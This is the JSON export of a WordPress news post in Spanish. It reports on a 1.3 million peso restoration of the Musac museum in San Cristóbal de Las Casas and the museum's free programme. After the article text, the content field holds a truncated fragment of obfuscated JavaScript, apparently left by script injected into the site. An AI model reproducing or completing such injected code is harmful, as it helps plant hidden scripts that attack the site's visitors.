{"id":8030,"date":"2023-01-13T04:33:49","date_gmt":"2023-01-13T04:33:49","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=8030"},"modified":"2023-01-13T04:33:50","modified_gmt":"2023-01-13T04:33:50","slug":"se-invierten-1-3-mdp-en-la-rehabilitacion-del-musac","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=8030","title":{"rendered":"Se invierten 1.3 MDP en la rehabilitaci\u00f3n del MUSAC"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/WhatsApp-Image-2023-01-12-at-5.00.17-PM-1-1024x768.jpeg\" alt=\"\" class=\"wp-image-8031\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/WhatsApp-Image-2023-01-12-at-5.00.17-PM-1-1024x768.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/WhatsApp-Image-2023-01-12-at-5.00.17-PM-1-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/WhatsApp-Image-2023-01-12-at-5.00.17-PM-1-768x576.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/WhatsApp-Image-2023-01-12-at-5.00.17-PM-1-1536x1152.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/WhatsApp-Image-2023-01-12-at-5.00.17-PM-1.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/CorresponsalSan Crist\u00f3bal de Las Casas.- En un aproximado de cuatro meses quedar\u00e1 lista la primera parte de la rehabilitaci\u00f3n de la parte sur del Museo de San Crist\u00f3bal (Musac), lo cual tendr\u00e1 una inversi\u00f3n aproximada de un mill\u00f3n 300 mil pesos, se\u00f1al\u00f3 el director de este recinto, Emilio G\u00f3mez Ozuna, quien asegur\u00f3 los talleres y exposiciones continuar\u00e1n en la parte baja del inmueble. \u201cTodo proceso de gesti\u00f3n tiene su tiempo, afortunadamente ya se est\u00e1 ejecutando la primera etapa, un edificio con estas caracter\u00edsticas y sobre todo c\u00f3mo qued\u00f3 despu\u00e9s del terremoto de 2017 es muy complicado, es un trabajo de restauraci\u00f3n y tiene que intervenir gente que tenga un perfil adecuado, para que quede en condiciones \u00f3ptimas\u201d, dijo. Asimismo, dijo que ya se encuentran colocando las mesas y sillas, para que la gente pueda ocupar el Parque de los H\u00e9roes, ya que \u00fanicamente se ha cerrado una parte, \u201cespero pronto nos permitan subir para que los medios puedan entrar y documentar lo que est\u00e1 pasando, hay algunos muros que hay que rescatar y tiene sus complicaciones, hay pisos estropeados, viene la impermeabilizada y posteriormente en una segunda etapa esperamos obtener recursos para equipar el museo\u201d. \u201cTenemos programadas ocho exposiciones queremos una sala digna, con luces y debidamente equipadas, vamos a inaugurar un par de salas con una exposici\u00f3n que viene de Oaxaca y tenemos una sala donde se expone brevemente la historia de San Crist\u00f3bal, tenemos una sala temporal con grabado, a partir de este s\u00e1bado y domingo tendremos talleres gratuitos\u201d. Finalmente, dijo que tienen tambi\u00e9n una secci\u00f3n de libros, para quien guste llegar a leer, \u201cvamos a poner ajedreces tambi\u00e9n y queremos que nos visite mucha gente, estamos teniendo un promedio de 120 visitantes al d\u00eda en las galer\u00edas, la idea del Musac es que todo lo que se haga ac\u00e1 sea gratuito, que no sea un lugar de lucro, sino un lugar de cultura, academia y arte\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/CorresponsalSan Crist\u00f3bal de Las Casas.- En un aproximado de cuatro meses quedar\u00e1 lista la primera parte de la rehabilitaci\u00f3n de la parte sur del Museo de San Crist\u00f3bal (Musac), lo cual tendr\u00e1 una inversi\u00f3n aproximada de un mill\u00f3n 300 mil pesos, se\u00f1al\u00f3 el director de este recinto, Emilio G\u00f3mez Ozuna, quien asegur\u00f3 los talleres &hellip;<\/p>\n","protected":false},"author":2,"featured_media":8031,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-8030","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8030","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8030"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8030\/revisions"}],"predecessor-version":[{"id":8032,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8030\/revisions\/8032"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/8031"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8030"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8030"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8030"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}